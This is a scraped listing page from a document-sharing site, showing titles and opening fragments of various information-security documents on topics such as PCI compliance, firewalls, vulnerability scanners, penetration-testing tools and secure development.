More informationSANDCAT THE WEB APPLICATION SECURITY ASSESSMENT SUITE WHAT IS SANDCAT? MAIN COMPONENTS. Web Application Security
SANDCAT WHAT IS SANDCAT? THE WEB APPLICATION SECURITY ASSESSMENT SUITE Sandcat is a hybrid multilanguage web application security assessment suite - a software suite that simulates web-based attacks. Sandcat
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationCMPT 471 Networking II
CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access
More informationCommon Security Vulnerabilities in Online Payment Systems
Common Security Vulnerabilities in Online Payment Systems Author- Hitesh Malviya(Information Security analyst) Qualifications: C!EH, EC!SA, MCITP, CCNA, MCP Current Position: CEO at HCF Infosec Limited
More informationJuniper Networks Secure
White Paper Juniper Networks Secure Development Lifecycle Six Practices for Improving Product Security Copyright 2013, Juniper Networks, Inc. 1 Table of Contents Executive Summary...3 Introduction...3
More informationHIPAA Compliance Use Case
Overview HIPAA Compliance helps ensure that all medical records, medical billing, and patient accounts meet certain consistent standards with regard to documentation, handling, and privacy. Current Situation
More informationRecon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins
Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins During initial stages of penetration testing it is essential to build a strong information foundation before you
More informationNCS 330. Information Assurance Policies, Ethics and Disaster Recovery. NYC University Polices and Standards 4/15/15.
NCS 330 Information Assurance Policies, Ethics and Disaster Recovery NYC University Polices and Standards 4/15/15 Jess Yanarella Table of Contents: Introduction: Part One: Risk Analysis Threats Vulnerabilities
More informationA43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006
IBM TRAINING A43 Modern Hacking Techniques and IP Security By Shawn Mullen Las Vegas, NV 2005 CSI/FBI US Computer Crime and Computer Security Survey 9 out of 10 experienced computer security incident in
More informationPatch and Vulnerability Management Program
Patch and Vulnerability Management Program What is it? A security practice designed to proactively prevent the exploitation of IT vulnerabilities within an organization To reduce the time and money spent
More informationWindows Remote Access
Windows Remote Access A newsletter for IT Professionals Education Sector Updates Issue 1 I. Background of Remote Desktop for Windows Remote Desktop Protocol (RDP) is a proprietary protocol developed by
More informationACS 5.x and later: Integration with Microsoft Active Directory Configuration Example
ACS 5.x and later: Integration with Microsoft Active Directory Configuration Example Document ID: 113571 Contents Introduction Prerequisites Requirements Components Used Conventions Background Information
More informationDFW INTERNATIONAL AIRPORT STANDARD OPERATING PROCEDURE (SOP)
Title: Functional Category: Information Technology Services Issuing Department: Information Technology Services Code Number: xx.xxx.xx Effective Date: xx/xx/2014 1.0 PURPOSE 1.1 To appropriately manage
More informationAN OVERVIEW OF VULNERABILITY SCANNERS
AN OVERVIEW OF VULNERABILITY SCANNERS February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole
More informationOffensive Security. Advanced Web Attacks and Exploitation. Mati Aharoni Devon Kearns. v. 1.0
Offensive Security Advanced Web Attacks and Exploitation v. 1.0 Mati Aharoni Devon Kearns Course Overview The days of porous network perimeters are fading fast as services become more resilient and harder
More informationMembers of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems
Soteria Health Check A Cyber Security Health Check for SAP systems Soteria Cyber Security are staffed by SAP certified consultants. We are CISSP qualified, and members of the UK Cyber Security Forum. Security
More informationHardening Joomla! (MNI)
Hardening Joomla! (MNI) Web Security SS10 Prof. Dr. Klaus Quibeldey-Cirkel 1 Content Introduction Giessen Aegis Suhosin Security Tests Live Demonstration Conclusion 2 Introduction Project Goal: Implementation
More informationCyber Exploits: Improving Defenses Against Penetration Attempts
Cyber Exploits: Improving Defenses Against Penetration Attempts Mark Burnette, CPA, CISA, CISSP, CISM, CGEIT, CRISC, QSA LBMC Security & Risk Services Today s Agenda Planning a Cyber Defense Strategy How
More informationCOURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM
COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM Course Description This is the Information Security Training program. The Training provides you Penetration Testing in the various field of cyber world.
More information